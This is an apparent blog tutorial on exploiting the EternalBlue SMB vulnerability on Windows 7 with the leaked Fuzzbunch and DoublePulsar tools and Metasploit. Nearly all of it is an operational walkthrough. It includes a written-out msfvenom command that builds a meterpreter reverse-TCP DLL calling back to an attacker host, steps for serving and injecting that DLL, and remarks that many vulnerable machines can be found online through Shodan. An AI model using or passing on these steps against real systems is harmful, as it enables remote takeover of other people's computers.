Eternalblue is a vulnerability in SMB on Windows 7 and older machines that were leaked by the ShadowBrokers group on April 14th, 2017. CVE-2017-0144, aka. Eternalblue is an incredibly severe vulnerability which the NVD gave a score of 8.1.
Eternalblue uses a buffer overflow in a memmove operation in Srv!SrvOs2FeaToNt. Basically, it pushes a DWORD which is then subtracted to a WORD, while the remainder of the DWORD overwrites memory. Later, another bug is used in srvnet!SrvNetWskReceiveComplete for the RIP hijack to execute the shellcode that was put into memory.
Eternalblue is the vulnerability of choice of the Petya ransomware that is currently running amuck globally right now. It’s the choice vulnerability because it’s easy to exploit, and there are hundreds of thousands of internet facing vulnerable machines. A simple search on Shodan found me more than I could imagine, so that means that anyone else could do the same.
Setting up the environment.
This demonstration involves these 3 machines:
- Victim: Vulnerable x64 Windows 7 machine.
- Attack Machine 1: Windows 7 with Fuzzbunch.
- Attack Machine 2: Linux (Kali) with Metasploit.
Obviously, my lab gives me the ideal circumstances to demonstrate this, but I assure you there are vulnerable hosts. A shit-load of them, online, right now. Additionally, there is no reason that the Fuzzbunch machine, the Kali machine, or both couldn’t be run in a virtual machine. None of the tools used are very resource intensive so they can easily be run in a small VM.
Attack Machine 1.
This machine needs to have Fuzzbunch installed, which is another NSA tool that was leaked by the ShadowBrokers. Fuzzbunch has some pre-requisites that need to be filled before we set it up though. We need the 32-bit versions of Python 2.6 and PyWin32 v212. Be sure to install Python first, otherwise, the PyWin installation will fail.
We need the ShadowBrokers dump, and it’s available on Github. Click on the “Clone or Download” button and grab the zip file. When you unpack it, find the windows folder and inside it create a new folder called “listeningposts”.
Open up the “Fuzzbunch.xml” file, you will need to make some changes. Find the lines that read:
<t:parameter name="ResourcesDir" description="Absolute path of the Resources Directory" type="String" default="D:\\DSZOPSDISK\\Resources"/> <t:parameter name="LogDir" description="Absolute path of an Initial Log Directory" type="String" default="D:\\logs"/>
and update the ResourcesDir and LogDir paths. Here is what mine looks like:
<t:parameter name="ResourcesDir" description="Absolute path of the Resources Directory" type="String" default="C:\\Users\\Hackr\\Desktop\\shadowbrokers-master\\windows\\Resources"/> <t:parameter name="LogDir" description="Absolute path of an Initial Log Directory" type="String" default="C:\\Users\\Hackr\\Desktop\\shadowbrokers-master\\windows\\logs"/>
Configure and fire Eternalblue.
This whole process is a little bit more involved than many exploits that we can just fire off from Metasploit and pull a shell, but it is really simple. The steps that we are going to follow:
- Fire the Eternalblue exploit with Fuzzbunch.
- Start a listener with Metasplot.
- Build a DLL with msfvenom for the reverse shell.
- Execute the DLL on the remote machine with Doublepulsar.
See, that doesn’t seem so hard, does it? So let’s get started.
Fire the Eternalblue Exploit.
Go ahead and fire up Fuzzbunch by CDing to the windows directory from the NSA dump and run the Python script.
After firing it up, you will have to give it some information such as the target address and callback address. Fill them in, and we will move on to create a new Fuzzbunch project.
Choose option 0 to create a new project (unless you have existing projects, then choose the appropriate option). Keep the defaults, and name the project whatever suits you. Now load up the Eternalblue module with the command:
Fuzzbunch will ask you to fill in the settings for Eternalblue. You can keep all the defaults EXCEPT the redirection option. Choose no.
When asked to be prompted with settings, choose yes and keep all the defaults except delivery mechanism. Choose option 1, Traditional deployment.
Finally it will ask if you want to execute the plugin. Choose yes, and pop that box.
At this point the machine is compromised, and the Eternalblue exploit is finished. Moving forward we have to turn this exploit into something we can use.
Create a listener with Metasploit.
In a bit, were going to create a DLL and inject it through the hole that we created with the Eternalblue exploit, but before we do we need to have a Metasploit listner ready for when we do.
Fire up the Metasploit console:
Now load up the listener, configure it, and start it.
Easy peasy lemon sqeezy.
Create a nasty DLL with msfvenom.
We are going to use the Metasploit tool “msfvenom” to create a DLL that we will later inject to get a shell within Metasploit. We are doing this in kali, but we are going to use the Windows machine to inject it. For this reason we are going to output the DLL to the webserver directory in Kali and start the webserver.
msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 –platform windows -f dll LHOST=10.10.0.193 LPORT=4444 > /var/www/html/launcher.dll
# start kali’s Apache server.
service apache2 restart
Inject the DLL with doublepulsar.
Before we can inject the file with doublepulsar, we need to download it to the Windows machine from the Kali machine. Open a browser and punch in the IP of the Kali box. If you did the same as me it will be located at http:///launcher.dll
Back in Fuzzbunch, load DoublePulsar.
Doublepulsar will ask if you want to be prompted with settings, choose the default YES. Going through the settings you can keep most of the defaults. If the target machine is 64 bit, you need to be sure to change the architecture setting to reflect that.
When you get to the function option, choose option 2 (RunDLL).
Now feed Doublepulsar the path to the DLL file. When I downloaded it, I saved it to the desktop.
Now just choose the defaults until Fuzzbunch asks if we want to run the Doublepulsar plugin. Choose yes.
After executing, you should see something like this.
Now if you go back to Metasploit, you should have a reverse TCP shell waiting for you.
And that’s it. You’re in!
Overall, the exploit requires a couple more steps than most script kiddie style exploits, but it’s still a really easy attack to pull off, that ends in a remote admin shell, which is a pretty damn good position if you ask me.
If I missed anything, if you have any questions, or if you just want to troll me feel free to drop a reply!